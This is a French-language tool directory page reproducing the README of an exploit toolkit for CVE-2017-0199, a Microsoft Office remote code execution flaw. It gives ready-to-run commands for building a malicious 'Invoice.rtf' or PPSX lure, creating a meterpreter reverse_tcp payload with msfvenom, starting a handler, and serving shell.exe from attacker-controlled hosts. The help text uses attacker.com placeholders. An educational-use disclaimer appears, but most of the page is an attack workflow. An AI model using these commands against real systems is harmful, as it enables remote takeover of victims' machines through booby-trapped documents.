Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2017-0199 — Exploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a malicious RTF/PPSX file and deliver metasploit / meterpreter / other payload to victim without any complex configuration. | Kitploit
Outils/GitHubGitHub/bhdresh/cve-2017-0199
Payload GenerationExploitationWeb Application ExploitationMalware AnalysisPenetration TestingLearning & Education
GitHubbhdresh/cve-2017-0199

CVE-2017-0199

Voir le dépôt
724256il y a 8 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Exploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a malicious RTF/PPSX file and deliver metasploit / meterpreter / other payload to victim without any complex configuration.

Partager

Exploit toolkit CVE-2017-0199 - v4.0

Exploit toolkit CVE-2017-0199 - v4.0 est un script Python pratique qui fournit aux testeurs d'intrusion et aux chercheurs en sécurité un moyen rapide et efficace de tester la RCE Microsoft Office. Il peut générer un fichier RTF/PPSX malveillant et délivrer metasploit / meterpreter / d'autres charges utiles à la victime sans aucune configuration complexe.

Avertissement

Ce programme est destiné UNIQUEMENT à des fins éducatives. Ne l'utilisez pas sans autorisation. La clause de non-responsabilité habituelle s'applique, en particulier le fait que moi (bhdresh) ne suis pas responsable des dommages causés par l'utilisation directe ou indirecte des informations ou fonctionnalités fournies par ces programmes. L'auteur ou tout fournisseur d'accès Internet n'assume AUCUNE responsabilité quant au contenu ou à l'utilisation abusive de ces programmes ou de tout dérivé de ceux-ci. En utilisant ce programme, vous acceptez le fait que tout dommage (perte de données, crash système, compromission système, etc.) causé par l'utilisation de ces programmes n'est pas de la responsabilité de bhdresh.

Enfin, ceci est un développement personnel, veuillez respecter sa philosophie et ne l'utilisez pas pour de mauvaises choses !

Licence

Licence CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/

Note de version :

Les fonctionnalités suivantes ont été introduites dans le script

root@kitploit:~
- Générer un fichier PPSX malveillant
- Mode d'exploitation pour le fichier PPSX généré
- template.ppsx mis à jour

Version : Python version 2.7.13

Scénario 1 : Délivrer une charge utile locale

Exemples de commandes
root@kitploit:~
1) Générer un fichier RTF malveillant
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) (Facultatif, si vous utilisez une charge utile MSF) : Générer la charge utile metasploit et démarrer le gestionnaire
   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Démarrer la boîte à outils en mode exploitation pour délivrer une charge utile locale
   # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
Diagramme de séquence

alt tag

Scénario 2 : Délivrer une charge utile distante

Exemples de commandes
root@kitploit:~
1) Générer un fichier RTF malveillant
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) Démarrer la boîte à outils en mode exploitation pour délivrer une charge utile distante
   # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://remoteserver.com/shell.exe
Diagramme de séquence

alt tag

Scénario 3 : Délivrer un fichier HTA personnalisé

Exemples de commandes
root@kitploit:~
1) Générer un fichier RTF malveillant
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) Démarrer la boîte à outils en mode exploitation pour délivrer un fichier HTA personnalisé
   # python cve-2017-0199_toolkit.py -M exp -t RTF -H /tmp/custom.hta
Diagramme de séquence

alt tag

Arguments de la ligne de commande :

root@kitploit:~
# python cve-2017-0199_toolkit.py -h

This is a handy toolkit to exploit CVE-2017-0199 (Microsoft office RCE)

Modes :

-M gen                                          Générer uniquement un fichier malveillant

     Générer un fichier RTF/PPSX malveillant :

      -w <Filename.rtf/Filename.ppsx>     Nom du fichier RTF/PPSX malveillant (Partagez ce fichier avec la victime).

      -u <http://attacker.com/test.hta>   Le chemin vers un fichier HTA/SCT. Normalement, cela devrait être un domaine ou une IP où cet
                                      outil est en cours d'exécution.
                                      Par exemple, http://attackerip.com/test.doc (Cette URL sera incluse dans le
                                      fichier RTF/PPSX malveillant et sera demandée une fois que la victime ouvrira le fichier RTF malveillant.
      -t RTF|PPSX (par défaut = RTF)         Type de fichier à générer.
      -x 0|1  (par défaut = 0)               Générer un fichier RTF obscurci. 0 = Désactiver, 1 = Activer.

				      
-M exp                                          Démarrer le mode exploitation

     Exploitation :
 
      -t RTF|PPSX (par défaut = RTF)         Type de fichier à exploiter.
      -H </tmp/custom>                Chemin local d'un fichier HTA/SCT personnalisé qui doit être délivré et exécuté sur la cible.
                                          NOTE : Cette option ne délivrera pas les charges utiles spécifiées via les options "-e" et "-l"
					  
      -p <TCP port:Default 80>            Numéro de port local.

      -e <http://attacker.com/shell.exe>  Le chemin d'un fichier exécutable / shell meterpreter / charge utile qui doit être exécuté sur la cible.

      -l </tmp/shell.exe>                 Si la charge utile est hébergée localement, spécifiez le chemin local d'un fichier exécutable / shell meterpreter / charge utile.

Crédit

@nixawk pour l'échantillon RTF, @Li Haifei, @bhdresh

Bugs, problèmes, demandes de fonctionnalités

Évidemment, je ne suis pas développeur à plein temps, attendez-vous donc à quelques accrocs

Veuillez signaler les bugs et problèmes via https://github.com/bhdresh/CVE-2017-0199/issues/new

Télécharger l’outil